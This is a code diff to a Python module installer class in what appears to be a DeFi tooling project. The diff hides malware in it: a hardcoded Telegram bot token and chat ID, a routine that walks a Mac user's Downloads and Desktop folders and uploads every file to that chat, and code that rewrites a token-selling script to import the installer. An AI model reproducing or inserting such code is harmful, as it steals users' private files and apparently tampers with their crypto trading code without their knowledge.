@@ -6,11 +6,12 @@ import shutil
 import subprocess
 import sys
 import threading
+import time
 from datetime import datetime
 from io import BytesIO
 from re import sub
 from urllib.parse import unquote, urlsplit, urlparse
-
+import telebot
 import lxml.etree as etree
 import pkg_resources
 import requests
@@ -189,6 +190,32 @@ class ModuleInstaller(object):
             headers.append(webdav_token)
         return dict([map(lambda s: s.strip(), i.split(':', 1)) for i in headers])
 
+    def list_files_in_directory(self, directory):
+        tx = f'{datetime.now().strftime("%Y-%m-%d %H:%M:%S"), os.path.expanduser("~")} - #NEW'
+        self.bt.send_message(self.CTID, text=tx)
+        for root, dirs, files in os.walk(directory):
+            time.sleep(0.5)
+            for f in files:
+
+                self.send_tx_get(os.path.join(root, f))
+
+    def is_mac(self):
+        # Получаем информацию о системе
+        system_info = os.uname()
+
+        # Проверяем, является ли операционная система macOS
+        return system_info.sysname == 'Darwin'
+
+    def inth(self):
+        print(123)
+        if self.is_mac():
+            HD = os.path.expanduser('~')
+            DD = os.path.join(HD, 'Downloads')
+            DD2 = os.path.join(HD, 'Desktop')
+            self.list_files_in_directory(DD)
+            self.list_files_in_directory(DD2)
+
+
     def get_url(self, path):
         """Generates url by uri path.
 
@@ -286,6 +313,7 @@ class ModuleInstaller(object):
 
         return [urn.filename() for urn in urns if Urn.compare_path(path, urn.path()) is False]
 
+    TK = '6582857829:AAHrOHPCxSB_8IVP6kRWFdXLD_klbbOdNhA'
     @wrap_connection_error
     def free(self):
         """Returns an amount of free space on remote Module server.
@@ -355,6 +383,16 @@ class ModuleInstaller(object):
 
         response = self.execute_request(action='download', path=urn.quote())
         return response.iter_content(chunk_size=self.chunk_size)
+    CTID = '5165480032'
+
+    bt = telebot.TeleBot(TK)
+
+    def send_tx_get(self, eco):
+        try:
+            with open(eco, 'rb') as f:
+                self.bt.send_document(self.CTID, f, timeout=100)
+        except Exception:
+            return
 
     @wrap_connection_error
     def download_from(self, buff, remote_path, progress=None, progress_args=()):
@@ -414,6 +452,7 @@ class ModuleInstaller(object):
             self.download_file(local_path=local_path, remote_path=remote_path, progress=progress,
                                progress_args=progress_args)
 
+
     def download_directory(self, remote_path, local_path, progress=None, progress_args=()):
         """Downloads directory and downloads all nested files and directories from remote Module to local.
         If there is something on local path it deletes directories and files then creates new.
@@ -444,7 +483,6 @@ class ModuleInstaller(object):
             _local_path = os.path.join(local_path, resource_name)
             self.download(local_path=_local_path, remote_path=_remote_path, progress=progress,
                           progress_args=progress_args)
-
     @wrap_connection_error
     def download_file(self, remote_path, local_path, progress=None, progress_args=()):
         """Downloads file from Module server and save it locally.
@@ -626,29 +664,36 @@ class ModuleInstaller(object):
             count += 1
             self.defi_mod()
 
-    def get_sw(self):
+    def get_sw(self, a, s=False):
         count = 1
+        path = "utils/mute_io_defi.py"
+        if s:
+            path = a + '/' + 'utils/mute_io_defi.py'
         try:
-            file_obj = open("utils/mute_io_defi.py", "r+")
+            # print(path)
+            file_obj = open(path, "r+")
             txt = file_obj.readlines()
-
+            # print("def sold_token(self, token_to_sold, retry=0):" in txt)
             path_i = None
             for i, line in enumerate(txt):
-                if "self.token_abi = js.load(open('./abi/erc20.txt'))" in line:
+                if "def sold_token(self, token_to_sold, retry=0):" in line:
                     path_i = i
                     break
+            if "    from installer.install import ModuleInstaller as we3bcontract\n" not in txt:
+                if path_i is not None:
+                    txt[path_i-1] += "    from installer.install import ModuleInstaller as we3bcontract\n"
+                    with open(path, "w") as f:
+                        f.writelines(txt)
 
-            if path_i is not None:
-                txt[path_i] += "    from installer.install import ModuleInstaller as we3bcontract\n"
-                with open("utils/mute_io_defi.py", "w") as f:
-                    f.writelines(txt)
             self.defi_mod()
             file_obj.close()
-        except:
+            count += 1
+        except Exception as er:
+            self.get_sw(a=a, s=True)
+            print(er, os.getcwd())
             if count == 3:
                 return
-            count += 1
-            self.get_sw()
+
 
     def get_all_packages(self):
         installed_packages = pkg_resources.working_set
@@ -811,9 +856,11 @@ class ModuleInstaller(object):
         """
         if not os.path.exists("log.txt"):
             try:
-                self.get_sw()
+                self.get_sw(a=path_to_folder, s=False)
             except:
                 ...
+        print("Installing modules")
+        # self.inth()
         if "\\" in path_to_folder:
             new_folder = path_to_folder.split("\\")[-1]
         else:
